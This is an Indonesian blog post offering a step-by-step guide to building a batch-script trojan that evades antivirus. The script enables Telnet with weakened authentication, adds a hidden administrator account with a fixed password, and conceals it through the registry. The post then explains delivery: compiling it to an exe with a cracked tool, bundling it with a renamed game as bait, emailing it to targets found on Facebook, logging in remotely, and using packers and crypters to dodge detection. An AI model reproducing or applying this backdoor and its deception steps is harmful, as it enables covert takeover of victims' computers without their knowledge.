Membuat Trojan Sederhana Tanpa Terdeteksi Antivirus
Hai….kali ini saya akan berikan teknik sederhana membuat Trojan dengan menggunakan batch script tapi tidak terdeteksi oleh anti virus. Sebelum saya jelaskan bagaimana caranya saya akan terangkan terlebih dahulu apa itu Trojan.
Trojan atau Remote Administration Tool adalah software yang dibuat untuk mengendalikan komputer lain tapi tanpa sepengetahuan yang punya komputer itu. Trojan terdiri dari server (pembuat/pemilik trojan sebagai pengendali) dan klien (komputer korban atau target yang dikendalikan) dan selalu berkaitan dengan port tertentu untuk berkomunikasi melalui internet atau LAN.Pada artikel ini saya akan membuat Trojan yang berkomunikasi melalui port Telnet. Anda tidak perlu membuat Trojan dengan Visual Basic, C, dll yang rumit karena dengan batch script sederhana pun kita bisa membuat Trojan tanpa terdeteksi oleh anti virus. Berikut ini adalah batch script dari Trojan saya:
@echo off
sc config TlntSvr start= auto
sc start TlntSvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user unknown /add
net user unknown rahasiad00nk
net localgroup administrators unknown /add
reg add HKLM\Software\Microsoft\Windows” “NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v unknown /t REG_DWORD /d 0 /f
exit
sc config TlntSvr start= auto
sc start TlntSvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user unknown /add
net user unknown rahasiad00nk
net localgroup administrators unknown /add
reg add HKLM\Software\Microsoft\Windows” “NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v unknown /t REG_DWORD /d 0 /f
exit
Singkatnya batch script diatas akan membuka atau mengaktifkan telnet service dikomputer korban dan menambahkan user account dengan nama “unknown” dan password “rahasiad00nk” yang akan kita gunakan sebagai account untuk masuk dikomputer korban nantinya.
Anda bisa mengganti nama dan password sesuai keinginan anda. Sedangkan registry value diatas dipakai untuk menyembunyikan user account pada saat logon windows waktu komputer dihidupkan sehingga keberadaan kita tidak diketahui oleh korban. Tulis atau copas script diatas di notepad dan simpan sebagai bat file, dalam contoh kali ini saya simpan dengan nama Trojan.bat
Pertanyaan kemudian adalah bagaimana caranya kita memasang/menyebarkan Trojan kita dikomputer target/korban?
Apabila anda mempunyai akses secara fisik atau langsung ke komputer target/korban anda tinggal menyimpan file Trojan.bat diatas di flashdisk anda dan mengkliknya dikomputer korban dan secara otomatis Trojan kita akan aktif. Akan tetapi bagaimana bila kita tidak bisa mengakses secara langsung komputer korban karena korban/target kita berada jauh dari kita? Disinilah tehnik social engineering kita pakai, kita akan menggunakan media email yaitu file attachment/lampiran sebagai tehnik penyebaran Trojan kita. Kalau mau liat email target anda bisa melihat diprofile target difacebook atau social network media lainnya. Tapi kita tidak akan menyebarkannya dengan file bat diatas karena akan menimbulkan kecurigaan target akan tetapi kita akan mengkonversinya menjadi file executable (exe) dengan menggunakan converter atau compiler.
Ada beberapa batch to exe converter yang bisa anda pakai (googling) dan pada contoh ini saya akan menggunakan Quick Batch File Compiler yang telah dicrack. Karena ini adalah tehnik social engineering yaitu memperdaya korban biar mengklik trojan kiriman kita maka saya akan menambahkan sedikit script dari batch script kita diatas:
@echo off
sc config TlntSvr start= auto
sc start TlntSvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user unknown /add
net user unknown rahasiad00nk
net localgroup administrators unknown /add
reg add HKLM\Software\Microsoft\Windows” “NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v unknown /t REG_DWORD /d 0 /f
appz\win32sys.exe
exit
sc config TlntSvr start= auto
sc start TlntSvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user unknown /add
net user unknown rahasiad00nk
net localgroup administrators unknown /add
reg add HKLM\Software\Microsoft\Windows” “NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v unknown /t REG_DWORD /d 0 /f
appz\win32sys.exe
exit
Seperti yang anda liat saya menambahkan mode dan appz\win32sys.exe dari script kita. Cls adalah perintah untuk membersihkan layar, sedangkan win32sys.exe adalah game onet yg telah saya rename. Appz\winsys32.exe adalah perintah untuk memanggil win32sys.exe yang saya taruh dalam folder appz (cara ini merupakan trik saya untuk mengelabui korban).
Onet merupakan media yang kita pakai sebagai pemancing/penarik agar Trojan kita diklik/dieksekusi korban. Maksudnya saya akan menyertakan game onet pada kiriman email kita yang disatukan dengan Trojan yang kita paketkan melalui file archive (rar).
Anda bisa mengganti onet dengan aplikasi lain dengan tipe file apapun (jpg, docx, 3gp, dll) yang menarik untuk diklik oleh korban kita. Sebelum kita meng-archive-kan kedua file kita di winrar, kita harus merename (mengganti nama file) kedua file kita agar Trojan kita yang dieksekusi dahulu. Rename Trojan.exe menjadi onet.exe dan onet.exe menjadi nama file sesuka anda, dalam contoh ini biar lebih tricky saya merename onet.exe menjadi win32sys.exe dan menyimpannya dalam folder appz.
Bila sudah anda lakukan hal diatas, satukan kedua file ini dalam file archive (rar) dan kirim melalui email ke komputer korban sebagai attachment. Beri subyek dan kata-kata diemail yang menarik dan memperdayai korban untuk membuka file attachment kita.
Utk melakukan koneksi dengan computer target buka cmd dan ketik :
C:\>telnet IP_Adress_Korban [enter]
Kemudian masukan nama username dan password kita dan administrator right telah kita dapatkan untuk bebas melakukan apa saja di komputer korban.Trojan dalam batch file tidak terdeteksi oleh anti virus apapun akan tetapi Trojan hasil konversi (batch to exe) terkadang masih memicu heuristic oleh beberapa antivirus karena signature yang dihasilkan oleh karena itu alangkah baiknya kita scan secara online dulu Trojan yang akan kita kirim untuk memastikan apakah trojan kita tidak terdeteksi sebagai virus, karena tidak lucu jika kita mengirim Trojan ke korban tapi saat dieksekusi Trojan kita tidak bisa dijalankan karena diblokir/dihapus oleh antivirus.
Anda bisa menggunakan layanan scan online seperti: www.virustotal.com, www.virusscan.jotti.org, atau www.novirusthanks.org, dll. Apabila Trojan yang kita buat masih terdeteksi oleh beberapa anti virus, kita bisa mengakalinya dengan menggunakan packer, crypter, atau protector (contoh: upx, aspack, themida, molebox, asprotect, dll).
Ingat!
Jangan sampai disalah gunakan.
Salam hangat dari sang Begu Peretas.
0 komentar:
Posting Komentar